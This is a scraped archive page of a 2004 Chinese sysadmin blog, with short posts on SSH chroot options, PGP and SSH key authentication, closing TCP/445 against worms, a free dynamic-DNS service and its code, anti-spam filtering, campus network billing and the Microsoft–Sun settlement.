chrooted",./apps/ssh/sshchsession.c:258: "will be chrooted",./apps/ssh/sshchsession.c:262: common->config->chroot_users,./apps/ssh/sshchsession.c:264: common->config->chroot_groups);./apps/ssh/sshchsession.c:492: if (ssh_user_needs_chroot(session->common->user_data, session->common))./apps/ssh/sshchsession.c:849: Boolean needs_chroot = FALSE, run_internal_sftp_server = FALSE;./apps/ssh/sshchsession.c:850: const char *chroot_dir = NULL;./apps/ssh/sshchsession.c:901: needs_chroot = ssh_user_needs_chroot(session->common->user_data,./apps/ssh/sshchsession.c:922: if (needs_chroot)./apps/ssh/sshchsession.c:924: chroot_dir = ssh_user_dir(session->common->user_data); ./apps/ssh/sshchsession.c:926: "User '%s' will be chrooted to directory '%s'.",./apps/ssh/sshchsession.c:927: ssh_user_name(session->common->user_data), chroot_dir);./apps/ssh/sshchsession.c:931: and chroots, as needed. */./apps/ssh/sshchsession.c:933: chroot_dir, close_fds, session))./apps/ssh/sshchsession.c:935: ssh_debug("Switching to user '%s' (with chroot) failed!",./apps/ssh/sshchsession.c:962: if (needs_chroot)./apps/ssh/sshchsession.c:966: ssh_debug("Chroot to user '%s' home directory failed!",./apps/ssh/sshchsession.c:1188: (needs_chroot ? "" :./apps/ssh/sftp-server2.c:92: XXX Logging in a chrooted environment is a _major_ pain in the./apps/ssh/sshconfig.c:1675: ADD_PARAM_PATTERN_LIST("ChrootUsers", &config->chroot_users, 0);./apps/ssh/sshconfig.c:1676: ADD_PARAM_PATTERN_LIST("ChrootGroups", &config->chroot_groups, 0);./apps/ssh/sshconfig.c:2111: config->chroot_users = NULL;./apps/ssh/sshconfig.c:2112: config->chroot_groups = NULL;./apps/ssh/sshconfig.c:2451: ssh_adt_destroy(config->chroot_users);./apps/ssh/sshconfig.c:2452: ssh_adt_destroy(config->chroot_groups);./apps/ssh/sshconfig.h:255: SshADTContainer chroot_users;./apps/ssh/sshconfig.h:256: SshADTContainer chroot_groups;./apps/ssh/sshd2_subconfig.5:208:.B ChrootGroups./apps/ssh/sshd2_subconfig.5:210:.B ChrootUsers./apps/ssh/sshd2_config:174:## Chrooted environment./apps/ssh/sshd2_config:176:# ChRootUsers anonymous,ftp,guest./apps/ssh/sshd2_config:177:# ChRootGroups sftp,guest./apps/ssh/subconfig/host_ext.example:17: ChrootGroups anonymous,sftp./apps/ssh/subconfig/anonymous.example:11:## /etc/passwd file. Chroot this user in main sshd2_config or host./apps/ssh/sshd-check-conf.5:52:.BR ChrootUsers ,./apps/ssh/sshd-check-conf.5:53:.BR ChrootGroups ,./apps/ssh/sshd-check-conf.c:117: "won't be chrooted",./apps/ssh/sshd-check-conf.c:118: "will be chrooted",./apps/ssh/sshd-check-conf.c:121: config->chroot_users,./apps/ssh/sshd-check-conf.c:123: config->chroot_groups))./apps/ssh/sshd-check-conf.c:124: ssh_informational(" User %s will be chrooted.\r\n", user);./apps/ssh/sshd-check-conf.c:126: ssh_informational(" User %s will not be chrooted.\r\n", user);./apps/ssh/sshd-check-conf.c:453: DUMP_PATTERN_LIST("ChrootUsers", config->chroot_users);./apps/ssh/sshd-check-conf.c:454: DUMP_PATTERN_LIST("ChrootGroups", config->chroot_groups);./apps/ssh/sshd2_config.5:315:.B ChRootGroups./apps/ssh/sshd2_config.5:316:This option works like \fBChRootUsers\fR, except that it can be used./apps/ssh/sshd2_config.5:322:.B ChRootUsers./apps/ssh/sshd2_config.5:324:gives all users listed here a chrooted environment (e.g. "/home")../apps/ssh/sshd2_config.5:971:requests. This enables better logging in chrooted environments, and./README:346: * For detailed info on how to set up chrooted accounts, see./README:411: needed in order to chroot sftp users, see FAQ)./HOWTO.anonymous.sftp:13: found by ssh-dummy-shell and sftp-server in the chrooted./HOWTO.anonymous.sftp:18: chrooting considerably. You don't need to build the static binaries../HOWTO.anonymous.sftp:27: chrooted environment, so choose wisely (you can change it later, of./HOWTO.anonymous.sftp:41: % ssh-chrootmgr -v ssh-guest # (or the account you created)./HOWTO.anonymous.sftp:51: ChRootUsers ssh-guest./HOWTO.anonymous.sftp:93: Note, that logging in the chrooted environment with a separate./HOWTO.anonymous.sftp:95: /dev/log device under the chrooted jail, and add that to the listened./HOWTO.anonymous.sftp:100: Logging in the chrooted jail is much simpler with the internal./projects/ssh-f-configd/fsma-oids/sshd2.oid:31:1.3.6.1.4.1.2213.36.1.2.7.5 ChRootUsers./projects/ssh-f-configd/fsma-oids/sshd2.oid:32:1.3.6.1.4.1.2213.36.1.2.7.6 ChRootGroups./CHANGES:160: * Removed ssh-pubkeymgr and ssh-chrootmgr from the distribution./CHANGES:269: that chroot() was not done../CHANGES:516: * sshd2: Changed chroot() logic. Now secondary groups will be./CHANGES:517: initialized after chrooting, without the need to copy /etc/group./CHANGES:518: to the chroot jail../CHANGES:1012: groups in the configuration (ie. ChrootGroups, AllowGroups, etc)../CHANGES:1128: * Added ssh-chrootmgr, a simple script to help in setting up./CHANGES:1129: chrooted environments for users../CHANGES:1135: ChRoot{Users,Groups}. Currently only works (that I know of) in GCC./CHANGES:1193: * Fixed a bug in ChRootGroups, which basically rendered it useless./CHANGES:1260: * Previous by tri: implemented ChRootGroups and ChRootUsers More...

Posted by windtear at 1:25 AM

April 13, 2004

PGP Freeware & PGP Public Key Server 我爱网络

http://www.pgpi.org/products/pgp/versions/freeware/ Freeware PGP versions Amiga (8) Atari (6) BeOS (5) EPOC (Psion etc.) MacOS (22) MS-DOS (9) Newton OS/2 (6) PalmOS (2) Unix (19) Windows 2000 (5) Windows 3.x (2) Windows 95/98/NT (31) Windows ME (3) Windows XP (4) -------------------------------------------------------------------------------- [ PGPi Home > Products > PGP > Versions > Freeware ] http://www.pgp.com/products/freeware.html PGP 8.0.3 Freeware for Windows http://download.pgp.com/products/desktop/freeware/PGP803-PF-W.zip More...

Posted by windtear at 12:25 AM

April 12, 2004

*.ipchina.org 域名超过 2000 我爱网络

Welcome to Windtear's Free Domain Service 加入收藏128 || myform.password.value.length>128) { alert("帐号密码不合法"); return false; }}function setFormFocus() { loginform.user.focus(); loginform.user.select();}-->设为首页我的网站ipchina.org 域名系统{提供 *.ipchina.org 免费域名} http://domain.ipcn.org/http://domain.ipchina.org/ 共有用户数共有域名数 (其中子域个数)16352005 (156)请在下面输入您的帐号名称和密码来登录: 帐号: 密码: 注册帐号忘记密码 ipchina.org 域名系统 FAQ -------------------------------------------- 2004-2-27 11:43 域名修改生效时间改为每天零点生效 2003-6-14 16:45 更新一下本文件运行半年纪念正式用户 645 个两天内仍未激活的用户 5 个共有 908 个域名！ 2003-4-13 本维护页面开通了国外的访问国外亦可通过 http://domain.ipchina.org/ 访问维护修改 2002-12-17 21:42 如果你自己不会架设或没有假设DNS服务器申请时请选择 Static More...

Posted by windtear at 11:44 AM

PGP(Pretty Good Privacy) 我爱网络

-----> first gpg GnuPG GNU Privacy Guard pgp Pretty Good Privacy @ previous article 《keychain - 力挺 RSA/DSA 密钥认证》曾提到 gpg --keyserver pgp.mit.edu --recv-key 302A3876 wget -O - http://dev.gentoo.org/~rajiv/rajivmanglani-pubkey.asc | gpg --import use gpg(gnupg) import the pgp key -----> PGP by Phil Zimmermann 基于RSA公匙加密体系的(邮件)签名、加密软件 PGP综合了传统加密方法和公开密钥加密方法的优点,所以保留了传统方法的速度优势,又拥有公开密钥方法的方便性 (传统加密方法的速度大约是公开密钥方法的1000倍) PGP在数字签名和密匙认证管理机制上有巧妙的设计用RSA加密解决了信件保密问题，但无法确信来信人，需要签名签名：甲用自己的私匙将128位的信件特征值加密，附加在邮件后，再用乙的公匙将整个邮件加密密文被乙收到以后，乙用自己的私匙将邮件解密，得到甲的原文和签名，乙的PGP也从原文计算出一个128位的特征值来和用甲的公匙解密签名所得到的数比较，如果符合就说明这份邮件确实是甲寄来的。这样两个安全性要求都得到了满足签名解决了，不过用乙的公匙加密整个邮件太慢了... 基于速度考虑，不用RSA加密信件，而用随机密钥传统加密信件随机密匙用传统加密算法IDEA算法对明文加密，然后用RSA算法对该密匙加密 look：既有RSA体系的保密性，又有IDEA算法的快捷性随机密钥：128位会话钥(sek=session key) 具体过程： (PKZIP算法压缩明文) 用随机密钥通过IDEA加密压缩后的明文 -> More...

Posted by windtear at 1:06 AM

April 11, 2004

keychain - 力挺 RSA/DSA 密钥认证 我爱网络

keychain - 力挺 RSA/DSA 密钥认证 Keychain http://www.gentoo.org/proj/en/keychain.xml -----> what The keychain bash script makes handling RSA and DSA keys both convenient and secure. It acts as a front-end to ssh-agent, allowing you to easily have one long-running ssh-agent process per system, rather than per login session. This dramatically reduces the number of times you need to enter your passphrase from More...

Posted by windtear at 1:28 AM

RSA/DSA 密钥认证demo - SecureCRT & PuTTY & ssh 我爱网络

SecureCRT: @SSH1 Cipher 3DES Authentication RSA (Password & TIS) D:\Documents and Settings\Administrator\Application Data\Van Dyke Technologies\SecureCRT\Identity Identity Identity.pub Identity.pub as /root/.ssh/authorized_keys ... @SSH2 Authentication Primary PlublicKey (Password & KeyboardInteractive) PuTTY: @SSH1 (puttygen.exe gen key pair) E:\Software\Network\putty\0.54\id_rsa.ppk E:\Software\Network\putty\0.54\id_rsa.pub id_rsa.pub as /root/.ssh/authorized_keys @SSH2 ... -----> PuTTY http://www.chiark.greenend.org.uk/~sgtatham/putty/ PuTTY: A Free Telnet/SSH Client Home | Licence | FAQ | Docs | Download | Keys More...

Posted by windtear at 1:06 AM

RSA/DSA 密钥认证代替标准安全密码认证 我爱网络

RSA key pair generation @ SSH1% ssh-keygen -t rsa.ssh/id_rsa.ssh/id_rsa.pub% scp ~/.ssh/id_rsa.pub remote:as ~/.ssh/authorized_keys% ssh -1 remotedone(must allow RSAAuthentication)DSA key generation @ SSH2% ssh-keygen -t dsa.ssh/id_dsa.ssh/id_dsa.pubtransfer to remote as~/.ssh/authorized_keys2...% ssh remoteEnter passphrase for key '/root/.ssh/id_rsa': root@remote's password: Permission denied, please try again.root@remote's password: % ssh remoteEnter passphrase for key '/root/.ssh/id_rsa': Last login: Sat Apr 10 21:55:10 2004 from tuxxxxxx.tsinghua.edu.cnwhen passphrase is nullpasswordless authentication is convenient, but very very very bad so% ssh-agent SSH_AUTH_SOCK=/tmp/ssh-XXIyUus1/agent.7245; export SSH_AUTH_SOCK;SSH_AGENT_PID=7246; export SSH_AGENT_PID;echo Agent pid 7246; 7246 ? S 0:00 ssh-agentwe should% eval `ssh-agent`Agent pid 7290% ssh-add Enter passphrase for /root/.ssh/id_rsa: Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)% ssh remoteLast login: Sun Apr 11 00:23:29 2004 from tuxxxxxx.tsinghua.edu.cnas u can seeeval `ssh-agent` & ssh-add very very inconvenientthe saviour is comingkeymain More...

Posted by windtear at 12:39 AM

挑战安全 - RSA/DSA 密钥体系 我爱网络

传统的加密方法也称为密钥或对称加密,加密和解密过程使用同一个密钥数据加密标准(DES)是传统加密方法，一个极简单的例子是置换密码公开密钥加密法解决密钥发布的问题公钥发布、私钥解密公开密钥的概念由Whitfield Diffie&Martin Hellman在1975年提出 Elgamal 以其发明者Taher Elgamal的名字命名 RSA 发明者Ron Rivest, Adi Shamir, and Leonard Adleman Diffie-Hellman 以发明者的名字命名 DSA Digital Signature Algorithm （数字签名算法）发明者David KravitzRSA（Rivest-Shamir-Adleman）算法是一种基于大数不可能质因数分解假设的公匙体系。想向一人发送加密消息，先找他的公开密钥，然后用此密钥加密消息给他，除他本人外，别人没有密钥解密，所以无法阅读该消息1997年，RSA组织公布当时密钥长度的标准：个人使用768位密钥，公司使用1024位密钥，而一些非常重要的机构使用2048位密钥目前RSA被广泛应用于各种安全或认证领域，如web服务器和浏览器信息安全、Email的安全和认证、对远程登录的安全保证和各种电子信用卡系统的核心：web服务器和浏览器信息安全 (另述见《apache 服务器的 CA 证书》)PGP(Pretty Good Privacy)，是一个基于RSA公匙加密体系的邮件加密软件 (另述)RSA/DSA 密钥认证系统，可代替标准安全密码认证系统 (另述) More...

Posted by windtear at 12:03 AM

April 10, 2004

上 MSN @CERNET 微软官方代理 202.194.15.124:8080 我爱网络

202.194.15.124:8080微软提供可以上MSN，访问以下网站：微软公司总部网站 www.microsoft.com微软开发者网站 http://msdn.microsoft.com/全球最大的.NET社区 www.gotdotnet.com知名ASP.net社区 www.asp.net学生技术讨论网站 www.thespoke.net微软全球学生软件开发大赛网站 www.imaginecup.com-----> http://mscenter.edu.cn/msdoor/.microsoft.com.passport.com.passport.net.passportimages.com.windowsupdate.com.hotmail.com.msn.com.msdnaa.net.interactservices.com.thespoke.net.gotdotnet.com.asp.net.wimdows.net.worldofdotnet.net.wimdows.net.c-sharpcorner.com.imaginecup.com第四步：选择您喜爱的网站。目前我们为大家提供了以下网站的资源供大家访问：微软公司总部网站 http://www.microsoft.com 微软开发者网站 http://msdn.microsoft.com最大的 .NET 社区 http://www.gotdotnet.com ASP.net 社区 http://www.asp.net 学生技术讨论网站http:// www.thespoke.net 微软全球学生软件开发大赛网站 http://www.imaginecup.com MSN messenger http://www.msn.com你还可以访问以下网站：http://www.c-sharpcorner.com http://www.wimdows.net http://www.worldofdotnet.net http://www.wimdows.net http://www.w3c.org More...

Posted by windtear at 1:03 AM

对抗病毒关掉 TCP/445 我爱网络

这几天针对 TCP/445 的病毒抬头以防万一关之大吉REGEDIT4[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]"SMBDeviceEnabled"=dword:00000000 More...

Posted by windtear at 12:59 AM

April 9, 2004

校园网个人用户包月卡上网服务无责任解读 我爱网络

发信人: windtear ( 死磕论文 ), 信区: THUNet标题: 校园网个人用户包月卡上网服务无责任解读发信站: BBS 水木清华站 (Fri Apr 9 10:20:19 2004), 转信该解读属于个人行为不是网络中心的公告供了解用具体自己分析公告1. 不计流量不许开代理或其他分享包月资源行为2. 80小时/30元 160小时/50元不限时不限流量/90元3. 不能用现有的 TUNet 帐号/网费，需要到中央主楼209室交费购买“包月卡”4. 包月至次月同一日同一时刻作为该包月卡使用月5. 携两证到网络中心帐号办理处（中央主楼208室）办理包月卡帐号。教工：身份证+工作证；学生：身份证+学生证；离退人员：身份证+退休证；访问学者、临时人员：身份证+主管部门介绍信。6. 登录方法同现有 TUNet 方法记得用新办的包月帐号记得断网!!!7. 特别提醒要及时加钱! 不然超过部分按照每小时1元计算发信人: windtear ( 死磕论文 ), 信区: THUNet标题: [转贴]网络中心开设校园网个人用户包月卡上网服务发信站: BBS 水木清华站 (Fri Apr 9 10:08:12 2004), 转信无责任转载以原处为准http://netsupport.tsinghua.edu.cn/baoyue.htm网络中心开设校园网个人用户包月卡上网服务在CERNET大力支持下，经学校同意，网络中心自2004年4月12日起办理“校园网个人用户包月卡上网服务”。本校所有学生、教工个人均可选用该服务。n 包月卡上网资费办法种类价格（元/月/人）包月限时80小时 30 包月限时160小时 50 包月不限时 90 该服务办法采用计时收费方式，不计流量，不区分国内、国际。包月卡服务使用者严禁开设代理服务或以任何方式将个人包月卡所提供的联网资源服务于他人，一经发现网络中心将停止对其提供上网服务。n 申请程序1，首次办理用户需为包月卡服务专门申请一个新帐号。①，携两证到网络中心帐号办理处（中央主楼208室）办理包月卡帐号。教工：身份证+工作证；学生：身份证+学生证；离退人员：身份证+退休证；访问学者、临时人员：身份证+主管部门介绍信。②，用户填写、签署“清华大学校园网个人用户包月卡帐号登记表”。③，从管理员处获得包月卡帐号/口令（用户原有的校园网帐号仅用于除包月卡服务以外的服务）。2，到网络中心会计室（中央主楼209室）交费购买“包月卡”。二次购卡，依据包月卡帐号直接到网络中心会计室（中央主楼209室）购买。“包月卡”为虚拟卡，每个卡有1个卡号（序列号）。用户交费购卡后，可以从https://usereg.tsinghua.edu.cn，“包月卡查询”网页查询到所购置的“包月卡”卡号。用户可以1次购买多个“卡”，购买时需决定好“使用顺序”，将来在当前卡使用超时时，系统会按“使用顺序”自动启用下一张卡。若包月卡帐号已有透支，再次购买包月卡时，需先结清包月卡帐号上的欠款。n 使用办法用户使用包月卡帐号/口令使用清华大学校园网登录客户端登录上网，或者通过https://usereg.tsinghua.edu.cn 登录上网。用户首次登录上网、系统自动启用“使用顺序号”最小的包月卡。修改口令、卡信息查询、上网计时状况信息查询在https://usereg.tsinghua.edu.cn。忘记口令，请持本人身份证，到网络中心帐号办理处（中央主楼208室）重建口令。n 计费办法按用户的实际启用包月卡时刻至次月同一日同一时刻作为该包月卡使用月，精确计时（例如，如果用户购买了1个月的包月卡，并在2004-2-24日上午10：10分启用，则该卡可以使用到2004-3-24日上午10：10分；如果，用户在2004-1-31日上午10：10分启用，则该卡可以使用到2004-2-29日上午10：10分）。如果使用超过卡的限时（总时间超过或者过期），且没有其他“可用”的卡，超过部分按照每小时1元计算，精确到小时，低于1小时的不计费。如果“当前卡”使用超时达到1小时，而且用户帐号中有其他“可用”的卡，系统自动启用“使用顺序号”最小的包月卡。n 注意事项1，包月卡仅限本人使用，不得开设代理服务或以任何方式将个人包月卡提供的联网资源服务于他人，一经发现，按“清华大学校园网个人用户包月卡帐号登记表”所述条款处理。2，系统从用户登录上网时刻开始计时，不计流量，不区分国际、国内，“中断连网”停止本次计时。3，特别提醒：使用https://usereg.tsinghua.edu.cn网页登录上网，切记用毕要回到该网页“中断连网”。未在网页上“中断连网”，就算关闭自己的计算机，系统也不会自动停止计时。4，包月卡一经使用不能再“退换”。清华大学信息网络工程研究中心2004年4月 More...

Posted by windtear at 10:37 AM

April 8, 2004

smartmontools (smartctl and smartd) - SMART 我爱网络

http://smartmontools.sourceforge.net/ The smartmontools package contains two utility programs (smartctl and smartd) to control and monitor storage systems using the Self-Monitoring, Analysis and Reporting Technology System (SMART) built into most modern ATA and SCSI hard disks. In many cases, these utilities will provide advanced warning of disk degradation and failure. Smartmontools is derived from the smartsuite package, and includes support More...

Posted by windtear at 12:52 AM

April 7, 2004

[IPCN] *.ipchina.org 动态域名系统代码发布 domain-v1.0.0 我爱网络

ipchina.org 域名系统 {提供 *.ipchina.org 免费域名}http://domain.ipcn.org/http://domain.ipchina.org/ 从 2002-12-14 正式运行以来共有用户数 1598共有域名数 (其中子域个数) 1980 (155) 不少朋友曾询问代码这里公开发布 1.0.0 版本欢迎大家修改、完善下载地址：http://ipcn.org/domain-v1.0.0.tgz-----> README基于 php/mysql 的动态域名系统 <windtear at ipcn dot org>本系统由 windtear 于 2004-04-07 公开发布 1.0.0 版本是 *.ipchina.org 动态域名系统的大致代码该系统 2002-12-14 正式运行该系统 php 部分采用了中国BBS转信系统 <http://cn-bbs.org> 的代码框架去除转信相关代码并重新设计数据库将用户域名分离给出了基于 perl/bash 的更新脚本安装:见 INSTALL(index.php 给出最简单的一个请自行修改)http://www.smth.org/pc/pccon.php?id=10&nid=4329&order=&tid=12*.ipchina.org 域名系统的技术实现用户界面主服务器：Redhat 7.3BIND域名服务器mysql数据库apache+php 用户注册激活域名注册修改删除用户管理 ...sh + perl 监控数据库变化生成域名配置全过程用户自助完成服务器定时任务进行监控更新另有4台服务器参与域名解析 (支持view)php 相关文件将近20个部分说明如下：|-- signup.php 用户注册|-- active.php 用户激活|-- login.php 登录界面|-- list.php 域名列表(含删除) (登录后默认页面)|-- index.php 首页：根据登录情况定向到 list.php 和 login.php|-- header.php 共用文件头部|-- footer.php 共用文件尾部|-- changeinfo.php 改变个人信息|-- lostpw.php 丢失密码取回密码界面|-- add.php 添加域名|-- modify.php 修改域名|-- config.php 系统配置|-- db_mysql.php 数据库连接|-- help.php 帮助`-- faq 帮助文件管理部分暂略：包括用户管理域名管理关联查询配置查看等三个数据库表：user 用户信息ns 域名信息myns 保留的域名信息---管理查看admin.php 简单的查看update.sh 自动更新脚本加入crontab (调用 get_mysql_data.pl gen_bind_data.pl)manual_update.sh 手动更新脚本get_mysql_data.pl 读取 mysql 数据到2.txt 便于比较数据变化和查看gen_bind_data.pl 生成 bind 数据的脚本 -----> INSTALL配置 www 服务器配置 mysql 服务器创建数据表 structure.sql修改 config.php修改 head.ipchina.org修改 faq header.php footer.php signup.php 改为自己的信息(index.php 给出最简单的一个请自行修改) -----> ChangeLog2004-04-07 windtear first release domain-v1.0.0-----> TODO1.完善管理部分代码2.增加 JavaScript 脚本，多做本地判断3.美化代码，调整部分结构 -----> AUTHORSwindtear <windtear at ipcn dot org>hightman <hightman dot bbs at bbs dot hightman dot net>Czz <czz at cn-bbs dot org> More...

Posted by windtear at 8:44 PM

AntiSpam - C/R System - TMDA - wle - 反垃圾邮件 我爱网络

病毒我们要反对无论是电脑病毒还是生物病毒垃圾我们也要反对介绍 Linux 下两个 C/R System 的反垃圾作品大家也可以自己用脚本语言做比如perl啥的:PC/R：Challenge/ResponseEmail confirmation system不少成熟的邮件系统都有邮件过滤机制匹配关键字匹配地址 ......后面顺便给出一个简单的关键字过滤 sample-----> TMDA 1.0.2http://tmda.net/Tagged Message Delivery Agent (TMDA)Copyright (C) 2001,2002,2003 Jason R. Mastaler <jason@mastaler.com>This software is OSI Certified Open Source Software.OSI Certified is a certification mark of the Open Source Initiative.TMDA is an open source software application designed to significantlyreduce the amount of spam (Internet junk-mail) you receive. TMDAstrives to be more effective, yet less time-consuming than traditionalspam filters. TMDA can also be used as a general purpose local maildelivery agent to filter, sort, deliver and dispose of incoming mail. The technical countermeasures used by TMDA to thwart spam include:* whitelists: accept mail from known, trusted senders.* blacklists: refuse mail from undesired senders.* challenge/response: allows unknown senders which aren't on the whitelist or blacklist the chance to confirm that their message is legitimate (non-spam).* tagged addresses: special-purpose e-mail addresses such as time-dependent addresses, or addresses which only accept certain kinds of communication. These increase the transparency of TMDA for unknown senders by allowing them to safely circumvent the challenge/response system.For more information, visit the TMDA homepage: <URL:http://tmda.net/>Information on the TMDA mailing lists can be found at: <URL:http://tmda.net/lists/listinfo/> INSTALL says how to install and configure TMDA.UPGRADE contains upgrade instructions from selected releases.CRYPTO explains the cryptography used in TMDA.THANKS contains acknowledgments and thanks.COPYING contains licensing information. -----> wle 0.3http://www.rfc1149.net/sam http://www.rfc1149.net/devel/wleThis is the WLE (White List Email) program, designed to keep unsollicitedmails far from your mailbox.This is a prerelease: the program works for me, but it is not guaranteedto work for anyone else. Moreover, there is no express setup nor anyconfiguration guide.Have a look at the INSTALL and sample-* files for basic instructions. Samuel Tardieu, sam@rfc1149.net, http://www.rfc1149.net/sam -----> a MTA filter sampleSubject Filter: Mail Delivery Mail Authentification Submit a Virus Sample Developement Mail Account Delivery Status Notification Re: hi MailServer Notification Protected Mail System important application Re: Proof of concept Re: Thank you for delivery Re: Delivery Protection I'm back! Re: your details ok... Fwd: Warning again Re: Your software Re: excel document Re: patched Re: read it immediately Re: Encrypted Mail Re: word document Re: Your picture Re: Question More...

Posted by windtear at 10:31 AM

April 6, 2004

祝俺家垃圾堆两岁生日快乐 我爱网络

发信人: windtear (借尸还魂请勿打扰 ※ 永远不要相信网络), 信区: BBSMan_Dev标题: 祝我开的第三个BBS生日快乐发信站: BBS 水木清华站 (Tue Apr 6 23:43:37 2004), 转信包括了 cn.bbs.* 垃圾堆的那个呵呵本站可注册帐号数: [20236] 目前已有帐号数: [36] 目前上站人数: [1/256] 从 [2002年 4月 6日] 起, 最高人数记录: [6] 累计访问人次: [22719]请输入帐号(试用请输入 `guest', 注册请输入`new'): 第一个： 28#27# 局域网时代第二个： 35#第三个：以堆垃圾为目的地低调站点第二、三个目前还都24/7运行着多少都用了第一个的一些东西-- ---== 上帝认证 ==---发信人: KCN (毒中之毒~life so hard), 信区: BoardManager标题: Re: 增加了版面管理困难度发信站: BBS 水木清华站 (Mon Dec 29 14:33:45 2003), 转信 windtear的人品是可信的。恩...※ 来源:·BBS 水木清华站 smth.org·[FROM: 166.111.154.35] More...

Posted by windtear at 11:46 PM

微软与Sun冰释前嫌全面合作共同对抗Linux 我爱网络

近几天的超大事件嗯http://tech.sina.com.cn/focus/microsoft_sun/index.shtml微软与Sun冰释前嫌全面合作共同对抗Linux 对于微软与Sun在2日达成的和解协议一事，业界人士称，之所以这两家老对手能够冰释前嫌，其主要原因是Linux产品已经成为了他们共同的敌人。>>[全文][评论] -------------------------------------------------------------------------------- Sun与微软的恩恩怨怨：·04年04.02 SUN获微软16亿美元赔款 10年官司最终烟消云散 ·04年03.27 Sun赞成欧委会决定微软没有根据实力竞争·04年01.18 美上诉法院裁定Sun诉微软案中微软有权质疑·03年12.22 Sun称微软停售旧版产品是强迫客户进行升级·03年11.17 深受微软垄断所害 Sun、Real听证会直陈血泪重要相关专题：·03年03.24 欧盟对微软施以6亿美元巨额罚款事件进展>> 驱动微软与Sun和解的根本原因：Linux和IBM (4月5日 10:48) 评论：Sun与微软停火和解能否终止双方的战争 (4月5日 10:47) 微软首席律师披露微软与Sun达成和解的经过 (4月5日 10:13) 微软、Sun握手言和共享软件领域胜利果实 (4月5日 09:53) Sun CEO麦克尼利攻击微软11句经典“佳句” (4月5日 09:39) Sun与微软达成全面和解协议宣布大量裁员 (4月5日 09:38) Sun及微软CEO访谈：从人身攻击到握手言欢 (4月5日 09:36) 19亿美元和解官司：微软露出温和的一面？ (4月5日 09:35) 微软与Sun和解标志着两公司对知识产权的尊重 (4月5日 09:33) 与微软和解10年官司并不意味Sun将阳光灿烂 (4月5日 09:32) 两家公司近期财报对比(单位：美元)微软03年第2季营收100亿，净利15.5亿SUN 03年第2季营收29亿，净亏1.25亿关于微软>> 微软积极寻求多方支持力图推翻欧盟处罚决定 (4月2日 17:45) 微软Longhorn测试版延期安全性成第一指标 (4月2日 14:57) 微软：Longhorn测试版可能推迟到明年发布 (4月2日 11:04) 盖茨认定安全第一微软补丁软件声誉提高 (4月2日 10:30) 微软发布MSDN中文网站年内提供600万字内容 (4月2日 10:17) 微软Office捆绑教育软件加强在华销售渠道 (4月1日 11:24) 索尼微软将展开价格战 XBOX先期在五国降价 (4月1日 11:21) 盖茨报告微软安全进展：“醉翁之意不在酒” (4月1日 10:08) 日本政府对微软展开反垄断调查 (4月1日 10:05) 盖茨向3500用户群发电邮报告微软安全进展 (4月1日 08:38) 微软与中国公司合作 Office捆绑教育软件销售 (4月1日 07:13) 微软迫于各方压力计划逐步公开部分源代码 (3月31日 11:16) 日本开始调查微软借鉴欧盟考虑制裁措施 (3月31日 08:29) 微软MSDN中文网站正式开通造福中国程序员 (3月31日 08:25) Linux在亚洲全面扩张微软价格策略面临终结 (3月31日 04:28) 关于Sun>> Sun青睐Opteron处理器将推最低价服务器 (4月2日 08:14) Sun搭上沃尔马快车推Linux台式机挑战微软 (4月2日 07:37) Sun拟改Solaris销售模式以抵制Linux竞争 (4月1日 15:12) Sun：Java开放源代码的大门仍没完全关闭 (4月1日 11:03) Sun将开发Java机顶盒和Java远程监视设备 (3月31日 15:26) Sun欲打翻身仗杀入低端市场 (3月30日 17:39) SUN近期发布一组全新的Sun Fire系统 (3月30日 15:46) Sun赞成欧委会决定微软没有根据实力竞争 (3月27日 15:13) Java是否应支持“开源” SUN公司骑虎难下 (3月27日 14:49) Sun将推新游戏服务器同时支持电脑和游戏机 (3月23日 07:29) 业界呼吁Java源代码尽早开放 Sun犹豫不决 (3月22日 10:21) 分析：Sun起死回生的最后一招“三权分立” (3月22日 09:06) Sun借口兼容性拒绝IBM提出Java开源的建议 (3月19日 15:56) Sun将推出StarOffice升级包目标直指微软 (3月17日 16:00) Sun称Java不适合源代码模式不考虑IBM建议 (3月17日 14:17) 微软中国大事记 1992年微软公司在北京设立办事处1993年微软公司建立微软北京测试中心1995年微软（中国）有限公司正式成立；微软中国研究开发中心成立1996年微软上海分公司和广州办事处成立1998年微软大中华区技术中心在上海成立；微软增资扩建微软中国研究开发中心；微软中国研究院在北京成立1999年微软增资将微软大中华区技术支持中心扩建为微软亚洲技术中心2001年微软中国研究院升格为微软亚洲研究院??微软亚洲技术中心升格为微软全球技术中心2002年微软中国公司成为中国软件行业协会会员；微软在中国投资的首家独立软件企业－中关村软件公司成立；微软在中国首家大比例参股的合资公司－上海微创软件公司成立；国家计委与微软签署谅解备忘录，共同开展中国最大软件对外合作项目，涉及金额超过62亿元人民币；微软（中国）有限公司落户成都，在西南地区成立办事机构。微软全球大事记 1975年4月4日微软成立1979年1月1日微软从新墨西哥州的Albuquerque迁至华盛顿州的Bellevue1981年6月25日微软组成公司1981年8月12日 IBM推出带有微软16位操作系统MS-DOS 1.0的个人计算机1986年2月26日微软将总部迁至华盛顿州的Redmond1986年3月13日微软股票上市1990年5月22日微软推出Windows 3.01995年8月24日微软推出Windows 951995年12月7日比尔·盖茨宣布微软将全力支持和发展互联网1998年6月25日微软推出Windows 982000年2月17日微软推出Windows 20002000年6月22日微软推出Microsoft.NET战略2001年10月25日微软推出 Windows XP2002年1月15日比尔·盖茨提出“可信赖计算”概念，强调软件产品安全性是重中之重2002年1月15日微软宣布.NET进入第二阶段自Sun Microsystems (SUNW)1982 成立之初起，Sun 所持的一个观点 - 网络就是计算机[tm] - 已促使 Sun 成为启用网络的工业用硬件、软件和服务的领先供应商。在 170 多个国家和万维网上均可以找到 Sun 的身影。 http://tech.sina.com.cn/it/2004-04-02/2131343433.shtml 新浪首页 > 科技时代 > 业界 > 微软与Sun就专利纠纷达成妥协专题 > 正文 SUN获微软16亿美元赔款 10年官司最终烟消云散 -------------------------------------------------------------------------------- http://www.sina.com.cn 2004年04月02日 21:31 新浪科技新浪科技讯北京时间4月2日晚，SUN公司发表正式声明，宣布与微软达成和解协议，由微软赔付16亿美元，最终私下了结双方长达10年的垄断和专利官司。16亿美元的赔付金额中有7亿美元用于平息微软与SUN之间旷日持久的垄断官司，另外的9亿美元用于了结双方的专利纠纷。另外，微软与Sun宣布签订一项为期十年的技术合作与许可证协议，以使双方的产品能够更好地相互协作。该项协议是这两家公司在以和解方式解决双方长久以来的法律纠纷之后宣布的。 